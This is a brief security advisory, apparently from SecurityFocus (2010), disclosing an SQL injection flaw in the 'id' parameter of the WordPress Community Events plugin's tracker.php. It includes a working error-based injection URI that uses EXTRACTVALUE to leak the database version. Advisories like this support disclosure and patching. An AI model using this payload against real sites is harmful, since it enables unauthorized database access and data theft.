WordPress Community Events Plugin 'id' Parameter SQL Injection Vulnerability

The following example URI is available:

http://www.example.com/wp-content/plugins/community-events/tracker.php?id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20


 

Privacy Statement
Copyright 2010, SecurityFocus